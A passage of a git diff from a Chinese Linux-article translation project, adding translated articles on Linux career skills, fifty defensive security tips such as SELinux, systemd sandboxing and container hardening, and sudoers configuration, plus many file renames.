`server.propertices`, 使用一个 nano 之类的编辑器进行编辑。记住要 root 权限。编辑 `online-mode` 行,它应该设置为 `true` ,修改为 `false` 并保存。重启服务器并打开“我的世界”服务器。使用客户端重新连接到服务器,现在应该一切都好了。 + +建设快乐! + +------ + +via: https://www.linuxforum.com/threads/minecraft-server-on-linux.3202/ + +作者:[Jarret][a] +译者:[erlinux](http://www.itxdm.me) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]: https://www.linuxforum.com/members/jarret.268/ +[1]: https://s3.amazonaws.com/Minecraft.Download/versions/%5Bversion%5D/minecraft_server.%5Bversion%5D.jar +[2]: https://s3.amazonaws.com/Minecraft.Download/versions/%5Bversion%5D/minecraft_server.%5Bversion%5D.jar diff --git a/published/20161228 10 Linux System Administrators New Years Resolutions 2017.md b/published/201701/20161228 10 Linux System Administrators New Years Resolutions 2017.md similarity index 100% rename from published/20161228 10 Linux System Administrators New Years Resolutions 2017.md rename to published/201701/20161228 10 Linux System Administrators New Years Resolutions 2017.md diff --git a/published/20161229 How Setup Go in Docker and Deploy an Application.md b/published/201701/20161229 How Setup Go in Docker and Deploy an Application.md similarity index 100% rename from published/20161229 How Setup Go in Docker and Deploy an Application.md rename to published/201701/20161229 How Setup Go in Docker and Deploy an Application.md diff --git a/published/20161230 Hot programming trends in 2016.md b/published/201701/20161230 Hot programming trends in 2016.md similarity index 100% rename from published/20161230 Hot programming trends in 2016.md rename to published/201701/20161230 Hot programming trends in 2016.md diff --git a/published/20161231 How to Trace Execution of Commands in Shell Script with Shell Tracing.md b/published/201701/20161231 How to Trace Execution of Commands in Shell Script with Shell Tracing.md similarity index 100% rename from published/20161231 How to Trace Execution of Commands in Shell Script with Shell Tracing.md rename to published/201701/20161231 How to Trace Execution of Commands in Shell Script with Shell Tracing.md diff --git a/published/20170102 A Guide To Buying A Linux Laptop.md b/published/201701/20170102 A Guide To Buying A Linux Laptop.md similarity index 100% rename from published/20170102 A Guide To Buying A Linux Laptop.md rename to published/201701/20170102 A Guide To Buying A Linux Laptop.md diff --git a/published/201701/20170103 4 hot skills for Linux pros in 2017.md b/published/201701/20170103 4 hot skills for Linux pros in 2017.md new file mode 100644 index 0000000000..a94e515690 --- /dev/null +++ b/published/201701/20170103 4 hot skills for Linux pros in 2017.md @@ -0,0 +1,62 @@ +2017 年成为 Linux 专家的 4 个热门技能 +============================================================ + +### 你在新的一年里需要刷哪些技能? + +![4 hot skills for Linux pros in 2017](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/lightbulb-idea-think-yearbook-lead.png?itok=56ovNk8n "4 hot skills for Linux pros in 2017") + +图片提供:[Internet Archive Book Images][1]。由 Opensource.com 修改。 CC BY-SA 4.0 + +成为 Linux 专家的一个问题是“专家”的定义在不断变化。当我进入 Linux 世界的时候,那时认为成为一个 _Linux 专家_,你需要能够编译自己的内核。天啊,如果你想在笔记本电脑上使用 Linux,即便你只是_用户_,你也必须编译一个自定义内核。 如今编译自己的内核通常是浪费时间。这不是说它并不重要,但在开源世界,我们建立在他人成功的基础之上,而 Linux 发行版为我们提供了运行良好的内核。虽然“专家”的定义并不总是那么剧烈变化,但对 IT 专业人员的需求每年都在变化。 + +下面是 2017 年 Linux 专业人员的四个重要技能: + +### 1、 安全 + +我不是在讨论安全专家或安全顾问。这些职位和服务当然很重要,但是随着联网设备渗透到我们生活的每一个方面,我们需要在我们做出的每一个决定中都具有[安全][2]意识。今年,我的妻子和我买了一台洗衣机和一台冰箱,它们都配备了蓝牙。黑客攻入我的漂洗系统的想法可能看起来很傻,但这都是潜在的攻击点。 + +当激活工作、家庭或我们的口袋中的任何系统时,我们应该考虑它们可能引发的安全问题。而且因为像联网烤面包机这样的物品不太可能及时获得固件升级,我们需要按照普通设备可能遭到破坏的思路来设计其余的系统。相比以前任何时候,我们更需要考虑来自防火墙内的攻击。不要让你的文件服务器被你的搅拌器破坏! + +### 2、 DevOps + +[DevOps][3] 不再是一个新概念。在过去两三年里,我们一直鼓励员工学习 DevOps,以便他们能够在工作中取得成功。这是个好建议,但这并不意味着我们应该完全依赖自动化工具来完成我们的工作。Chef、Puppet、Ansible、Salt Stack 及类似的工具是美好的,但我们需要了解背后发生了什么,所以当发生一些不可避免的错误,我们应该知道如何解决它。 + +使用 DevOps 的编程方法来计算,我们仍然需要能够维护、修复和理解在代码层之下运行的系统的人。没有 Linux 专家,云计算将是一个可怕的地方,即使那个云在你自己的机房里。 + +### 3、 开发 + +作为系统管理员,20 年来,我从来没有时间学习编程。这听起来可能是一个借口,但这是事实。我所有的开发技能就是基本的脚本编写,以帮助我更快工作。不过,那些日子已经结束了。虽然我们需要在 DevOps 世界中拥有系统管理技能,但我们还需要系统管理员拥有编程技能。 + +如果你是一个像我一样的老练的系统管理员,你可能已经采用 DevOps 并每天使用它。如果你真的想要胜过他人,你需要学习如何以编程方式解决问题,并且不要认为 Chef 或 Puppet 代码只是配置文件。 每个 IT 专业人员都至少需要掌握编程的概念,因为 DevOps 代码至少在某种程度上抽象了 IT 的每个方面。 + +### 4、 软技能 + +通常,我们在准备职业生涯时所考虑的最后一件事是所谓的 *软技能* - 社交和沟通技巧 - 但是它们可能是最有可能决定你走向成功的技能。无论你正在寻找一份新工作,还是试图适应当前职业生涯的变化,软技能是至关重要的。 + +划分 IT 各个领域的标准是交错的,并且良好的沟通能力使得这些模糊的分野成为一个有利条件,而不是绊脚石。我们正生活在一个开发人员围绕着服务器,而运维团队编写 Ruby 代码来维护服务器农场的世界里。这些都是 IT 中的大胆的新思想,如果人们不能在不同部门间很好的沟通,工作场所将迅速有敌对气氛。此外,IT 人员总是需要与其他业务领域的人员进行有效沟通。而且,现在比以往有更大的需求。 + + +你计划在 2017 年里添加什么到你的技能中?在评论栏中让我们知道吧。 + +-------------------------------------------------------------------------------- + +作者简介: + +![](https://opensource.com/sites/default/files/styles/profile_pictures/public/Shawn%20Powers%20350%20x%20250%20px_2.jpg?itok=6n0E_-Z2) + +Shawn Powers - 自 2009 年起是 CBT Nuggets (www.cbtnuggets.com) 的一名 IT 训练员,专于 Linux、Chef 及为大规模网络集成多个平台。他在 2016 年 12 月发布了一个在线高级 Linux 认证课程(LPIC-2)。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/yearbook-4-hot-skills-linux-pros-2017 + +作者:[Shawn Powers][a] +译者:[geekpi](https://github.com/geekpi) +校对:[jasminepeng](https://github.com/jasminepeng) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/shawnpowers +[1]:https://www.flickr.com/photos/internetarchivebookimages/14758810172/in/photolist-oubL5m-ocu2ck-odJwF4-oeq1na-odgZbe-odcugD-w7KHtd-owgcWd-oucGPe-oud585-rgBDNf-obLoQH-oePNvs-osVgEq-othPLM-obHcKo-wQR3KN-oumGqG-odnCyR-owgLg3-x2Zeyq-hMMxbq-oeRzu1-oeY49i-odumMM-xH4oJo-odrT31-oduJr8-odX8B3-obKG8S-of1hTN-ovhHWY-ow7Scj-ovfm7B-ouu1Hj-ods7Sg-qwgw5G-oeYz5D-oeXqFZ-orx8d5-hKPN4Q-ouNKch-our8E1-odvGSH-oweGTn-ouJNQQ-ormX8L-od9XZ1-roZJPJ-ot7Wf4 +[2]:https://opensource.com/tags/security +[3]:https://opensource.com/tags/devops diff --git a/published/20170103 How to Customize Bash Colors and Content in Linux Terminal Prompt copy.md b/published/201701/20170103 How to Customize Bash Colors and Content in Linux Terminal Prompt copy.md similarity index 100% rename from published/20170103 How to Customize Bash Colors and Content in Linux Terminal Prompt copy.md rename to published/201701/20170103 How to Customize Bash Colors and Content in Linux Terminal Prompt copy.md diff --git a/published/20170104 5 Ways to Find a Binary Command Description and Location on File System.md b/published/201701/20170104 5 Ways to Find a Binary Command Description and Location on File System.md similarity index 100% rename from published/20170104 5 Ways to Find a Binary Command Description and Location on File System.md rename to published/201701/20170104 5 Ways to Find a Binary Command Description and Location on File System.md diff --git a/published/201701/20170104 50 ways to avoid getting hacked in 2017 copy.md b/published/201701/20170104 50 ways to avoid getting hacked in 2017 copy.md new file mode 100644 index 0000000000..bca625b32c --- /dev/null +++ b/published/201701/20170104 50 ways to avoid getting hacked in 2017 copy.md @@ -0,0 +1,185 @@ +50 种系统免遭黑客侵袭的方法 [2017 年版] +============================================================ + +> Paul Simon 概括了“与爱人分手的 50 法”,而这里,我们提供了提高系统安全性的 50 种方法。 + + ![secure your systems](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/rh_003601_05_mech_osyearbook2016_security_cc.png?itok=VNmpz6K- "secure your systems") + +图片来自:  + +Opensource.com + +当我还是小孩子,耳畔萦绕着 Paul Simon 的流行歌:“[与爱人分手的50法][3]”。当我渐渐地长大,突然受歌的启发,收集了 50 种方法,免得你——门内汉和门外汉——遭受黑客侵袭啊: + +### “你刚刚从后头溜出去了,杰克” + +1、 备份你的数据。如果你不幸被勒索软件光顾,那么你就不用支付赎金,因为你做了备份。 + +2、 当你需要在公共场所为你的手机充电,那就使用 [sysncstop][4]吧,或者你也可以用你的备份电池。(LCTT 译注:sysncstop 是一种可以在公共场所安全充电的 USB 设备。在公共场所充电的风险,你知道的。) + +3、 利用好你的审计系统,里头有好多很酷的工具可以帮助你监控系统。如果你确实遭到了入侵,那么审计系统也许就可以告诉你发生了什么,以及攻击者做了些什么。 + +4、 说到日志,把日志定向到集中式服务器上总是一个不错的想法,因为如果某个黑客侵入你的系统里,他首先要攻击的就是日志系统以便隐藏他的踪迹。构建一个好的入侵检测系统来监控日志,这对于防范黑客也很有帮助。 + +### “做份新的计划吧,斯坦” + +5、 以强制模式运行 SELinux(见 [StopDisablingSelinux.com][5])。不要觉得我现在还在喋喋不休地说这个可笑。SELinux 可以防止 0day 漏洞的影响。当[破壳][6]漏洞出现的时候,SELinux 曾是唯一的防护手段。 + +6、 如果可能,在 [SELinux 沙盒][7]中运行应用程序吧——在容器火遍全球前,它就已经是容器了。同时,请关注 [Flatpack][8] 开发,这个工具很快会开发沙盒功能。 + +7、 不要安装或者使用 Flash。Firefox 不再支持它了,同时也希望大多数 web 服务器正在远离它。 + +8、 使用[受约束的 SELinux 用户][9]来控制用户在你的系统中所能做的事。如果你正运行着一台共享登录的系统,设置用户为 `guest_t`。 + +### “你不必害羞,罗伊” + +9、 利用 [systemd 工具的能力][10]来帮助你提升系统安全。大多数系统攻击是通过那些监听着网络的服务来实现的,而 Systemd 提供了一些很棒的方法来锁定服务。例如,使用 [PrivateTmp=yes][11] 。Privatemp 利用挂载命名空间来为服务器的 `/tmp` 设置一个私有的 **tmpfs** 挂载,这可以阻止被入侵的服务访问到主机 `/tmp` 中的内容,以及针对系统中基于监听 `/tmp` 的服务的潜在攻击。 + +10、 `InaccessibleDirectories=/home` 是一个 systemd 单元的选项,它使用挂载命名空间的方式使从服务的角度看不到 `/home` 目录(或者其它任何目录),这会使得被入侵的服务攻击到数据更为困难。 + +11、 `ReadOnlyDirectories=/var` 是另外一个 systemd 单元的选项,它使用挂载命名空间的方式来将目录内容变成只读模式。基本上你总是可以让 `/usr` 运行在**只读模式**。这可以阻止一个被入侵的应用程序重写二进制文件,因为那可以在下次服务重启时,该服务依旧是被入侵的。 + +12、 降低服务权限(`CapabilityBoundingSet=CAP_CHOWN CAP_KILL`)。在内核中,特权服务被分解成一些列不同的权限。大多数服务不需要很多权限(如果需要一些的话),而 systemd 提供了一个简单的开关来从服务中剥离这些权限。 + +13、 如果服务不使用网络,那么你可以使用 `PrivateNetwork=yes` 来为该服务关闭网络功能。只需在服务的单元文件中开启该选项,就可以享受它带来的好处,关闭服务所有可用的网络。黑客常常并不是真的想破坏你的机器——他只是想用它作为攻击服务器来攻击其它机器。如果服务连不上网络,那么就不会受到攻击。 + +14、 控制服务可用的设备。 Systemd 提供了 `DeviceAllow` 配置,它控制了该服务可用的设备。`DeviceAllow=/dev/null rw` 将访问限制为 `/dev/null`,且仅可访问该设备节点,不允许对其它任何设备节点的访问。该功能实现于设备的 cgroup 控制器顶端。 + +15、 Systemd 系统即将迎来的一个新功能是 [`ProtectSystem Strict`][2],该功能可以开启所有这些命名空间以完全锁定服务运行的环境。 + +### “刚刚重获自由” + +16、 不要使用没有运行着 SELinux([SEAndroid][11])强制模式的手机。幸运的是,我听说目前超过 90% 的安卓手机都运行着 SEAndroid 的强制模式,这真让我高兴。现在要是我们能让那些果粉们使用 SELinux 就好了。 + +17、 只从受信源安装软件。不要安装你从因特网找来的危险东西,对于你的手机、计算机系统、虚拟机以及容器等等也一样。 + +18、 我不会在我的手机上进行网上银行操作——我只在我的 Linux 计算机上做这事儿。如果黑客偷了我的信用卡,也许我就丢了那么 50 美元;而如果他黑进我的银行账户,那我丢的钱就会更多。我想我是个老古板。(“滚出我的地盘。”——那些老古板都会这样说。) + +19、 我用我手机做的一件很酷的事情,就是设置让我的信用卡公司每次在我的信用卡消费时给我发送短信。那样的话,如果账号被盗,我会更快地知道。 + +20、 当你需要安全地通讯,请使用 [Signal 安全信息应用][12]。 + +### “搭个便车,格斯” + +21、 在你的计算机系统上运行 Linux。当我第一次想用计算机联络我的父亲时,在他的计算机中毒前,我很少回家。我回去给他的系统安了个 Linux,而他从那以后就一直运行着它。我相信 Linux 大体上说是一个更加安全的系统,因为它的设计方式。而且我也相信这个桌面被黑的可能性也相对较小,因为用它的人相对较少。有些人或许要持反对意见了,他们会说 Windows 在过去几年中已经有了很大的改进了,但对于我而言,我仍然坚持己见。 + +22、 只运行那些有[安全响应团队][13]进行安全监管的发行版。企业软件及其重要。 + +23、 运行一个企业级内核。在容器中,单点故障往往是内核。如果你想要保证它安全,那么就使用一个企业级内核,即便它不是一个最新的版本,但也包含了最新的安全补丁。记住,最新的内核虽然带来了最新的安全补丁,但是它也带来了大量的新代码,这些代码可能存在漏洞。 + +### “你不要说太多” + +24、 大多数非法入侵都是通过社会工程学实施的——例如,电子邮件链接、web 浏览器攻击,以及电话。对于此,最好的选择是接受相关教育,并且对一切留个心眼儿。没有哪个来自尼日利亚的家伙会给你钱,国税局也不会打电话到你家问你要钱。如果你电子邮件收到了来自你银行的电子邮件,里面包含有到某个网站的链接,那么不要直接去点击那个链接,在 web 浏览器中输入那个地址来打开。 + +25、 总是把你的系统打上最新的安全补丁。已知有安全漏洞以及过时的系统的数量十分可怕,脚本小子们依赖于你**不**更新系统。 + +26、 当连接到网络上的服务时,请始终使用 HTTPS。Chrome 和 Firefox 现在有个强制开启 HTTPS 的模式。到 2016 年为止,那些还不支持安全通讯的网站可能就不值得你们访问。 + +27、 在你的容器中使用 [seccomp][14],这会将攻击限制在内核之外,内核是个单点故障。限制什么进程可以具体讨论。 + +### “就把那钥匙丢下吧,李” + +28、 使用 [YubiKey][15] 来存储私钥。 + +29、 加密你系统上的数据。至少对于笔记本而言,应该把**家目录**以及你的其它数据目录加密。几年前,我正乘坐在伦敦的地铁上,我的笔记本就成了某些人的目标——我下了车,车门关上了,而我发现我的笔记本不见了。此时,地铁已经驶出了站台。幸运的是,我把磁盘加密了。 + +30、 给你的所有网站用上 [Let's Encrypt][16] 吧,没有任何理由不再运行 HTTPS 了。 + +31、 绝不要在不同 web 服务器上使用相同的密码。虽然这个很难不落入陷阱,但是像 [Let's Encrypt][16] 这样的工具会有很大帮助。如果你使用 ssh 密钥来登录进系统,这会更好。 + +32、 使用双因素认证(2FA)。密码变得无关紧要,使用 Yubikey 以及诸如此类的工具可以使得双因素认证很方便,我们都有手机。在大脑中记一个密码,并在手机中生成一个密钥,总是比一个密码来得更好。 + +33、 网站总要我注册个帐号,没有比这更激怒我的事情了——我们就不能做得更好点?对于网站密码,始终都要使用密码生成工具来生成。我是个保守派:我使用 [Password Safe][17] 来生成密码,然后剪切粘贴到 web 浏览器中。我听说,其他人使用 [LastPass][18],或者其它整合在手机和 web 服务中的工具也用着不错。 + +34、 配置像 [FreeIPA][19] 之类的服务用于身份认证。使用像 [Kerberos][20] 之类的工具来认证和授权,会使得跟踪雇员及其对系统的访问更为简便(而且它也有很酷的加密服务)。使用活动目录也很不错,或许我有点偏颇。 + +35、 如果你经常输入密码,那就使用一个容易记忆的句子,而不是一个单词。我所偏好的用于记忆密码的方式,就是使用有几个单词并且易于输入的词组。 + +### “让自己自由” + +36、 使用 [USBGuard][21] 来保护你的系统免遭流氓 USB 设备破坏。 + +37、 在过去几年中,我一直工作于容器方面,让我们来说说容器的安全吧。首先,让它们在开启强制模式的 SELinux 的系统中运行。如果你的系统不支持 SELinux,那就换个支持它的版本吧。SELinux 是使用文件系统来保护容器免遭破坏的最佳工具。 + +38、 如果可能,在容器中跑你的服务吧。我相信,使用 [OCI 镜像格式][22] 和 Linux 容器技术是应用的未来。用 [runC][23]、OCID、RKT、Systemd-nspawn 等等来启动这些容器。虽然我常常说“容器并不包容“,但是不要在容器外面运行这些服务更好一些。 + +39、 在虚拟机中运行容器。虚拟机提供比容器更好的隔离机制,在虚拟机中跑像容器之类的东西,更加灵活有弹性,并且互相隔离。 + +40、 在不同的虚拟机中,按不同的安全需求跑容器应用。你可以在 DMZ 中的虚拟机上跑 web 服务容器,而在 DMZ 外的虚拟机上跑数据容器。 + +41、 同时,记得在不同的物理机上跑需要最高安全性的虚拟机,并且容器放在不同虚拟机上(这也叫深度防护)(LCTT 译注:此处原文有误,根据理解修改)。 + +42、 以[只读模式][24]跑容器。开发环境中的容器需要能够写入到 `/usr`,但是生产环境中的容器只能写入到 `tmpfs`,并且将卷挂载到容器中。 + +43、 [降低容器权限][25]。不管是在容器中,还是在容器外,我们都以比它们所需的更多的“权限”跑它们的进程,你可以通过降低权限来让你的进程更加安全。 + +44、 [不要以 root 身份在容器中跑进程][26]。大多数服务都不需要 root 特权,或者它们需要该权限来绑定到低于 1024 的端口,然后切换到非 root 用户。我建议你始终以非 root 身份来跑应用。 + +45、 给你的容器打上最新的 CVE 补丁。使用像 OpenShift 这样的工具来构建并维护你的容器镜像是个不错的主意,因为它会在新的安全补丁出现时自动重构容器镜像。 + +46、 我的一个同事说 “Docker 就是用来在你的主机上以 root 身份运行来自因特网的随机代码的。”从一个受信源获取软件,不要抓取你在 docker.io 上随便找到的第一个 Apache 应用。[操作系统有重要关系][27]。 + +47、 在一台受限的容器化优化的主机上跑生产环境容器,例如在一台[原子主机][28]上,它开启了所有安全特性,为运行中的容器而优化,带有限制攻击层和原子级更新。有什么不喜欢的吗? + +48、 使用像 [OpenScap][29] 这样的工具来扫描你系统的漏洞。糟糕的是,新的漏洞总是层出不穷,所以你得时刻更新你的扫描器。(也可以看看 [原子扫描][30],用于扫描你的容器。) + +49、 OpenScap 也具有扫描[安全配置][31]的功能,如 STIG(安全技术部署指南)。 + +50、 为你孩子收到的所有那些圣诞物联网设备设置一个特别的客户网络。我钟爱我的 Amazon Echo,还有自动化灯以及电源开关(“Alexa,打开圣诞灯“),但是所有这些都是由可能存在安全问题的 Linux 操作系统控制。 + +### ”一定还有着另外 50 种免遭黑客侵害的方法“ + +你会为这个列表添加点什么呢?在下面的评论中告诉我们吧。 + +_Josh Bressers 对本文作出贡献。_ + +-------------------------------------------------------------------------------- + +作者简介: + +![](https://opensource.com/sites/default/files/styles/profile_pictures/public/walsh1.jpg?itok=JbZWFm6J) + +Daniel J Walsh - Daniel Walsh 已经致力于计算机安全领域将近 30 年。Dan 在 2001 年 8 月份加入 Red Hat。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/yearbook-50-ways-avoid-getting-hacked + +作者:[Daniel J Walsh][a] +译者:[GOLinux](https://github.com/GOLinux) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/rhatdan +[1]:http://danwalsh.livejournal.com/51459.html +[2]:https://www.phoronix.com/scan.php?page=news_item&px=systemd-New-Protect-Tunables +[3]:https://www.youtube.com/watch?v=0H5chfbcWtY +[4]:http://syncstop.com/ +[5]:http://stopdisablingselinux.com/ +[6]:http://danwalsh.livejournal.com/71122.html +[7]:http://danwalsh.livejournal.com/31146.html +[8]:http://flatpak.org/ +[9]:http://danwalsh.livejournal.com/37404.html +[10]:http://0pointer.de/blog/projects/security.html +[11]:https://source.android.com/security/selinux/ +[12]:https://whispersystems.org/ +[13]:https://access.redhat.com/blogs/766093/posts/2695561 +[14]:https://lwn.net/Articles/656307/ +[15]:https://www.yubico.com/ +[16]:https://letsencrypt.org/ +[17]:https://pwsafe.org/ +[18]:https://www.lastpass.com/ +[19]:https://www.freeipa.org/page/Main_Page +[20]:https://web.mit.edu/kerberos/ +[21]:https://github.com/dkopecek/usbguard +[22]:https://www.opencontainers.org/ +[23]:https://runc.io/ +[24]:http://www.projectatomic.io/blog/2015/12/making-docker-images-write-only-in-production/ +[25]:http://rhelblog.redhat.com/2016/10/17/secure-your-containers-with-this-one-weird-trick/ +[26]:https://www.projectatomic.io/blog/2016/01/how-to-run-a-more-secure-non-root-user-container/ +[27]:https://opensource.com/16/12/yearbook-why-operating-system-matters +[28]:https://access.redhat.com/articles/rhel-atomic-getting-started +[29]:https://www.open-scap.org/ +[30]:https://developers.redhat.com/blog/2016/05/02/introducing-atomic-scan-container-vulnerability-detection/ +[31]:https://www.open-scap.org/security-policies/scap-security-guide/ diff --git a/published/20170104 Speed up your downloads with Axel command line downloader.md b/published/201701/20170104 Speed up your downloads with Axel command line downloader.md similarity index 100% rename from published/20170104 Speed up your downloads with Axel command line downloader.md rename to published/201701/20170104 Speed up your downloads with Axel command line downloader.md diff --git a/published/20170105 PhotoRec – Recover Deleted or Lost Files in Linux.md b/published/201701/20170105 PhotoRec – Recover Deleted or Lost Files in Linux.md similarity index 100% rename from published/20170105 PhotoRec – Recover Deleted or Lost Files in Linux.md rename to published/201701/20170105 PhotoRec – Recover Deleted or Lost Files in Linux.md diff --git a/published/201701/20170107 10 Useful Sudoers Configurations for Setting sudo in Linux.md b/published/201701/20170107 10 Useful Sudoers Configurations for Setting sudo in Linux.md new file mode 100644 index 0000000000..c689e68d5f --- /dev/null +++ b/published/201701/20170107 10 Useful Sudoers Configurations for Setting sudo in Linux.md @@ -0,0 +1,247 @@ +在 Linux 中设置 sudo 的十条 sudoers 实用配置 +=================== + +在 Linux 和其他的类 Unix 操作系统中,只有 root 用户可以运行所有的命令,才能在系统中执行那些需要鉴权的操作,比如安装、升级和移除软件包、[创建用户和用户组][1]、修改系统重要的配置文件等等。 + +然而,系统管理员,比如说 root 用户,可以通过 [sudo 命令][2] 和一些配置选项来给普通用户进行授权,从而让该普通用户可以运行某些命令已经上述的那些相当重要的系统级操作。 + +另外,系统管理员还可以分享 root 用户密码 (这个做法是不值得提倡的),这样普通用户就可以通过 `su` 命令来转化为 root 用户角色。 + +`sudo` 允许已授权用户按照指定的安全策略、以 root 用户 (或者是其他的用户角色) 权限来执行某个命令。 + +1. `sudo` 会读取和解析 `/etc/sudoers` 文件,查找调用命令的用户及其权限。 +2. 然后提示调用该命令的用户输入密码 (通常是用户密码,但也可能是目标用户的密码,或者也可以通过 `NOPASSWD` 标志来跳过密码验证)。 +3. 这之后, `sudo` 会创建一个子进程,调用 setuid() 来切换到目标用户。 +4. 接着,它会在上述子进程中执行参数给定的 shell 或命令。 + +以下列出十个 `/etc/sudoers` 文件配置,使用 `Defaults` 项修改 sudo 命令的行为。 + +``` +$ sudo cat /etc/sudoers +``` + +`/etc/sudoers` 文件: + +``` +# +# This file MUST be edited with the 'visudo' command as root. +# +# Please consider adding local content in /etc/sudoers.d/ instead of +# directly modifying this file. +# +# See the man page for details on how to write a sudoers file. +# +Defaults env_reset +Defaults mail_badpass +Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" +Defaults logfile="/var/log/sudo.log" +Defaults lecture="always" +Defaults badpass_message="Password is wrong, please try again" +Defaults passwd_tries=5 +Defaults insults +Defaults log_input,log_output +``` + +#### Defaults 项的类型 + +``` +Defaults parameter, parameter_list ### 对任意主机登录的所有用户起作用 +Defaults@Host_List parameter, parameter_list ### 对指定主机登录的所有用户起作用 +Defaults:User_List parameter, parameter_list ### 对指定用户起作用 +Defaults!Cmnd_List parameter, parameter_list ### 对指定命令起作用 +Defaults>Runas_List parameter, parameter_list ### 对以指定目标用户运行命令起作用 +``` + +在本文讨论范围内,我们下面的将以第一个 `Defaults` 作为基准来参考。parameter 参数可以是标记 (flags)、整数值或者是列表 (list)。 + +值得注意的是,标记 (flag) 是指布尔类型值,可以使用 `!` 操作符来进行取反,列表 (list) 有两个赋值运算符:`+=` (添加到列表) 和 `-=` (从列表中移除)。 + +``` +Defaults parameter +或 +Defaults parameter=值 +或 +Defaults parameter -=值 +Defaults parameter +=值 +或 +Defaults !parameter +``` + +### 1、 安置一个安全的 PATH 环境变量 + +该 `PATH` 环境变量应用于每个通过 `sudo` 执行的命令,需要注意两点: + +1. 当系统管理员不信任 `sudo` 用户,便可以设置一个安全的 `PATH` 环境变量。 +2. 该设置将 root 的 PATH 和用户的 PATH 分开,只有在 `exempt_group` 组的用户不受该设置的影响。 + +可以添加以下内容来设置: + +``` +Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" +``` + +### 2、 允许 tty 用户会话使用 sudo + +该设置允许在一个真实的 tty 中进行调用 `sudo`,但不允许通过 cron 或者 cgi-bin 脚本等方法来调用。添加以下内容来设置: + +``` +Defaults requiretty +``` + +### 3、 使用 pty 运行 sudo 命令 + +少数情况下,攻击者可以通过 sudo 来运行一个恶意程序 (比如病毒或者恶意代码),这种恶意程序可能会分叉出一个后台运行的进程,即使主程序完成执行,它仍能够运行在用户的终端设备上。 + +为了防止出现这样的情况,你可以通过 `use_pty` 参数来设置 `sudo` 使用伪终端来运行其他命令,而不必管 I/O 日志的开启状态。如下: + +``` +Defaults use_pty +``` + +### 4、 创建 sudo 日志文件 + +默认下,`sudo` 通过 syslog(3) 来记录到日志。但是我们可以通过 `logfile` 参数来指定一个自定义的日志文件。如下: + +``` +Defaults logfile="/var/log/sudo.log" +``` + +使用 `log_host` 和 `log_year` 参数可以对应记录日志主机名和 4 位数年份到自定义日志文件。如下: + +``` +Defaults log_host, log_year, logfile="/var/log/sudo.log" +``` + +下面是自定义 sudo 日志文件的例示: + +[![Create Custom Sudo Log File](http://www.tecmint.com/wp-content/uploads/2017/01/Create-Sudo-Log-File.png)][3] + +*创建 sudo 日志文件* + +### 5、 记录 sudo 命令的输入/输出 + +`log_input` 和 `log_output` 参数可以让 `sudo` 命令运行在伪终端,并可以对应地记录所有的用户输入和输出到屏幕上。 + +默认的 I/O 日志目录为 `/var/log/sudo-io`,如果存在会话序列号,它将被存储到该目录。你可以通过 `iolog_dir` 参数来指定一个目录。 + +``` +Defaults log_input, log_output +``` + +这其中支持转义字符,像 `%{seq}` —— 以 36 为基数的单调递增序列,比如 000001,这里每两个数字都分别用来形成一个新目录。请看下边例示 00/00/01: + +``` +$ cd /var/log/sudo-io/ +$ ls +$ cd 00/00/01 +$ ls +$ cat log +``` + +[![Log sudo Input Output](http://www.tecmint.com/wp-content/uploads/2017/01/Log-sudo-Input-Output.png)][4] + +*记录 sudo 命令的输入/输出* + +[cat 命令][5] 来查看该目录的其余部分。 + +### 6、 为 sudo 用户提示命令用法 + +如下,使用 `lecture` 参数可以在系统中为 `sudo` 用户提示命令的用法: + +参数属性值有三个选择: + +1. `always` – 一直提示 +2. `once` – 用户首次运行 sudo 时提示 (未指定参数属性值时的默认值) +3. `never` – 从不提示 + +``` +Defaults lecture="always" +``` + +此外,你还可以使用 `lecture_file` 参数类自定义提示内容,在指定的文件中输入适当的提示内容即可: + +``` +Defaults lecture_file="/path/to/file" +``` + +[![Lecture Sudo Users](http://www.tecmint.com/wp-content/uploads/2017/01/Lecture-Sudo-Users.png)][6] + +*为 sudo 用户提示命令用法* + +### 7、 输入错误的 sudo 密码是显示自定义信息 + +当某个用户输错密码时,会有一个对应的信息显示在屏幕上。默认是“抱歉,请重新尝试。(sorry, try again)”,你可以通过 `badpass_message` 参数来修改该信息: + +``` +Defaults badpass_message="Password is wrong, please try again" +``` + +### 8、 增加 sudo 密码尝试限制次数 + +`passwd_tries` 参数用于指定用户尝试输入密码的次数。 + +默认为 3。 + +``` +Defaults passwd_tries=5 +``` + +[![Increase Sudo Password Attempts](http://www.tecmint.com/wp-content/uploads/2017/01/Increase-Sudo-Password-Attempts.png)][7] + +*增加 sudo 密码尝试限制次数* + +使用 `passwd_timeout` 参数设置密码超时 (默认为 5 分钟),如下: + +``` +Defaults passwd_timeout=2 +``` + +### 9、 在输错密码时让 sudo 羞辱用户 + +使用了 `insults` 参数之后,一旦你输出了密码,sudo 便会在命令窗口中显示羞辱你的信息。这个参数会自动关闭 `badpass_message` 参数。 + +``` +Defaults insults +``` + +[![Let's Sudo Insult You When Enter Wrong Password](http://www.tecmint.com/wp-content/uploads/2017/01/Sudo-Insult-Message.png)][8] + +*在输错密码时让 sudo 羞辱用户* + +### 10、 更多关于 sudo 的配置 + +此外,欲了解更多 sudo 命令的配置,请自行阅读:[su 与 sudo 的差异以及如何配置 sudo][9]。 + +文毕。你也可以在评论区分享其他有用的 sudo 配置或者 [Linux 技巧][10]。 + +--------------------------------------------------------------------- + +作者简介:Aaron Kili 是一名 Linux 和 F.O.S.S 忠实拥护者、高级 Linux 系统管理员、Web 开发者,目前在 TecMint 是一名活跃的博主,热衷于计算机并有着强烈的只是分享意愿。 + 